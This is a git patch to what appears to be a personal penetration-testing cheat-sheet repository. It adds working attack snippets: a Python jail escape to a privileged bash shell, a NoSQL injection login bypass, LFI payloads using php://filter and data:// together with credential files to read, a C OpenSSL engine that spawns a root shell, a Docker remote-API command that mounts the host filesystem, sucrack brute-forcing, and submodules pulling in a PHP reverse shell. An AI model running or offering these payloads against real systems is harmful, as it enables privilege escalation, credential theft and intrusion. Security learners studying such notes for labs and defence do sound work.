From 512b365a34252c69c745f35b945a9e1914541260 Mon Sep 17 00:00:00 2001 From: whx Date: Thu, 9 Dec 2021 01:50:04 +0100 Subject: [PATCH] some more docker --- .gitmodules | 6 +++ exploit/linux/sudo/baron_samedit.md | 7 +-- exploit/python/jail_escape.md | 18 ++++++++ exploit/sqli/no_sqli.md | 19 ++++++++ exploit/web/csrf.md | 10 +++++ exploit/web/local_file_inclusion.md | 42 +++++++++++++++--- exploit/web/xss.md | 4 ++ exploit/web/xxe/xxeserv | 1 + hashes/password_cracking/john.md | 6 +++ hashes/password_cracking/sucrack.md | 8 ++++ misc/level3_hypervisor/docker_sec/docker.md | 1 + misc/openssl/openssl_engine.md | 44 +++++++++++++++++++ .../docs/windows/powershell_logs.md | 10 +++++ reverse_shells/phpreverseshell | 1 + 14 files changed, 167 insertions(+), 10 deletions(-) create mode 100644 exploit/python/jail_escape.md create mode 160000 exploit/web/xxe/xxeserv create mode 100644 hashes/password_cracking/sucrack.md create mode 100644 misc/openssl/openssl_engine.md create mode 100644 post_exploitation/docs/windows/powershell_logs.md create mode 160000 reverse_shells/phpreverseshell diff --git a/.gitmodules b/.gitmodules index c11b0df..f9bfd06 100644 --- a/.gitmodules +++ b/.gitmodules @@ -88,3 +88,9 @@ [submodule "post_exploitation/Invoke-EDRChecker"] path = post_exploitation/Invoke-EDRChecker url = https://github.com/PwnDexter/Invoke-EDRChecker.git +[submodule "reverse_shells/phpreverseshell"] + path = reverse_shells/phpreverseshell + url = https://github.com/rootkral4/phpreverseshell.git +[submodule "exploit/web/xxe/xxeserv"] + path = exploit/web/xxe/xxeserv + url = https://github.com/staaldraad/xxeserv.git diff --git a/exploit/linux/sudo/baron_samedit.md b/exploit/linux/sudo/baron_samedit.md index eaf8fab..5e76a4e 100644 --- a/exploit/linux/sudo/baron_samedit.md +++ b/exploit/linux/sudo/baron_samedit.md @@ -8,6 +8,7 @@ ```sh sudoedit -s '\' $(python -c "print('\x41' * 10000)") ``` - - - +* Defaults to try +```sh +./brute.sh 90 120 50 70 150 300 +``` diff --git a/exploit/python/jail_escape.md b/exploit/python/jail_escape.md new file mode 100644 index 0000000..95d40d0 --- /dev/null +++ b/exploit/python/jail_escape.md @@ -0,0 +1,18 @@ +# Escaping Jails + +* [Aneesh's blog](https://anee.me/escaping-python-jails-849c65cf306e?gi=a7d3bac81831) + +## Usage + +* Circumvent via `__builtins__` +```python +dir(__builtins__) +``` +```python +__builtins__.__dict__ +``` +* Call builtins +```python +__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash -p') +``` + diff --git a/exploit/sqli/no_sqli.md b/exploit/sqli/no_sqli.md index 26b369f..9245473 100644 --- a/exploit/sqli/no_sqli.md +++ b/exploit/sqli/no_sqli.md @@ -9,7 +9,26 @@ * [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/) * [Elasticsearch docs](https://www.elastic.co/guide/index.html) +# Operators +* Most common +```sql +$and +$or +$eq +$ne +$gt +$where +$exists +$regex +``` + ## Tips & Tricks * Pass HTTP parameter as an array instead of `user=` and `password=` use `user[$operator]=foo` and `password[$operator]=bar` * 2D array via `user[$nin][]=foo` + +## Example +* POST or GET parameters +```sh +username=admin&password[$ne]=admin +``` diff --git a/exploit/web/csrf.md b/exploit/web/csrf.md index 435546d..f5768a5 100644 --- a/exploit/web/csrf.md +++ b/exploit/web/csrf.md @@ -1 +1,11 @@ # CSRF + +## Protection + +* May be a hidden field with an encoded value +```html + +``` +* This field need to be removed in order to do some csrf shenanigans +* Decode the value to reproduce some valid content. + diff --git a/exploit/web/local_file_inclusion.md b/exploit/web/local_file_inclusion.md index 611a816..20ac5e4 100644 --- a/exploit/web/local_file_inclusion.md +++ b/exploit/web/local_file_inclusion.md @@ -2,6 +2,14 @@ To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed. * [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/) +## PHP Functions +* Functions provoking an LFI +```php +include() +require() +include_once () +require_once() +``` ## Usage @@ -37,18 +45,15 @@ curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20.. * [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2) * Log poisoning and opening logfile via `/proc/self/fd/xx`. -### Base64 Encoding via PHP -* Circumvent filter via encoding local files included ins a GET parameter value -```http -curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=.php -``` - ## Files of Interest * `/etc/issue` * `/etc/profile` * `/proc/version` * `/etc/passwd` * `/etc/shadow` +* `/etc/group` +* `/etc/motd` +* `/etc/mysql/my.cnf` * `/root/.bash_history` * `/var/log/dmessage` * `/var/mail/root` @@ -56,10 +61,33 @@ curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=< * `/var/log/apache2/access.log` * `C:\boot.ini` * `/proc/self/fd/xx` +* `/proc/version` +* `/proc/cmdline` +* `/proc/[0-9]*/fd/[0-9]*` + +* `sess_` if the location of the session file is known. Some paths are +```sh +c:\Windows\Temp +/tmp/ +/var/lib/php5 +/var/lib/php/session +``` + +### Base64 Encoding via PHP +* Circumvent filter via encoding local files included ins a GET parameter value +* __Read PHP files through encoding them, so they won't be executed__ +```http +curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=.php +curl http://test.com/test.php?file=php://filter/read=string.rot13/resource=/etc/passwd +``` +* Use encoded data as input through the parameter +```sh +curl http://test.com/test.php?file=data://text/plain;base64,dGhlIGFuc3dlciBpcyA0Mgo= +``` ## Tricks * Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4 * Terminate query with `/.` * `..//..//..//file`, double slashes - +* URL encode path diff --git a/exploit/web/xss.md b/exploit/web/xss.md index 951611f..d2eb8a2 100644 --- a/exploit/web/xss.md +++ b/exploit/web/xss.md @@ -124,6 +124,10 @@ document.onkeypress = function (e) { ## Tricks and Tips * Use Polyglots * [XSS Filter Evasion Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html) +* Close the a vulnerable, exploitable tag and open a script tag +```html + +``` ## Protection Methods diff --git a/exploit/web/xxe/xxeserv b/exploit/web/xxe/xxeserv new file mode 160000 index 0000000..046c559 --- /dev/null +++ b/exploit/web/xxe/xxeserv @@ -0,0 +1 @@ +Subproject commit 046c559a3c1a65d3a41a2fb706807b9e48e66563 diff --git a/hashes/password_cracking/john.md b/hashes/password_cracking/john.md index 936f7f4..3a51428 100644 --- a/hashes/password_cracking/john.md +++ b/hashes/password_cracking/john.md @@ -35,3 +35,9 @@ $[0-9]$[0-9] ```sh john --wordlist=single_password.txt --rules=best64 --stdout > out.txt ``` + +### Subformats +* Some salted passwords need dynamic rules +```sh +john --list=subformats +``` diff --git a/hashes/password_cracking/sucrack.md b/hashes/password_cracking/sucrack.md new file mode 100644 index 0000000..132fba8 --- /dev/null +++ b/hashes/password_cracking/sucrack.md @@ -0,0 +1,8 @@ +# sucrack + +* [Repo](https://github.com/hemp3l/sucrack.git) +* Upload to target and build +```sh +sucrack -u -w 100 +``` + diff --git a/misc/level3_hypervisor/docker_sec/docker.md b/misc/level3_hypervisor/docker_sec/docker.md index b92d249..c07b48c 100644 --- a/misc/level3_hypervisor/docker_sec/docker.md +++ b/misc/level3_hypervisor/docker_sec/docker.md @@ -41,6 +41,7 @@ dive ```sh docker -H tcp://test.com:2375 ps docker -H tcp://test.com:2375 exec + docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh ``` * [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease) diff --git a/misc/openssl/openssl_engine.md b/misc/openssl/openssl_engine.md new file mode 100644 index 0000000..98363d9 --- /dev/null +++ b/misc/openssl/openssl_engine.md @@ -0,0 +1,44 @@ +# OpenSSL Engine + +* Hook external libs +* [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/) + +* Most minimal example +```C +#include + +static int bind(ENGINE *e, const char *id) +{ + return 1; +} + +IMPLEMENT_DYNAMIC_BIND_FN(bind) +IMPLEMENT_DYNAMIC_CHECK_FN() +``` + +* Shell as root +```C +#include +#include + +static int bind(ENGINE *e, const char *id) +{ + setuid(0); + setgid(0); + system("/bin/bash"); +} + +IMPLEMENT_DYNAMIC_BIND_FN(bind) +IMPLEMENT_DYNAMIC_CHECK_FN() +``` + +* Compile +```C +gcc -fPIC -o rootshell.o -c rootshell.c +gcc -shared -o rootshell.so -c -lcrytpo rootshell.o +``` + +* Execute via +```sh +openssl engine -t `pwd`/rootshell.so +``` diff --git a/post_exploitation/docs/windows/powershell_logs.md b/post_exploitation/docs/windows/powershell_logs.md new file mode 100644 index 0000000..f7b0dbc --- /dev/null +++ b/post_exploitation/docs/windows/powershell_logs.md @@ -0,0 +1,10 @@ +# Powershell Logs + +## Transcript Logs + +* Enable via +```sh +reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0x1 /f +reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v OutputDirectory /t REG_SZ /d C:/ /f +reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableInvocationHeader /t REG_DWORD /d 0x1 /f +``` diff --git a/reverse_shells/phpreverseshell b/reverse_shells/phpreverseshell new file mode 160000 index 0000000..72873b9 --- /dev/null +++ b/reverse_shells/phpreverseshell @@ -0,0 +1 @@ +Subproject commit 72873b93fa3d960ce35f8c46d6fd8195a45f17c0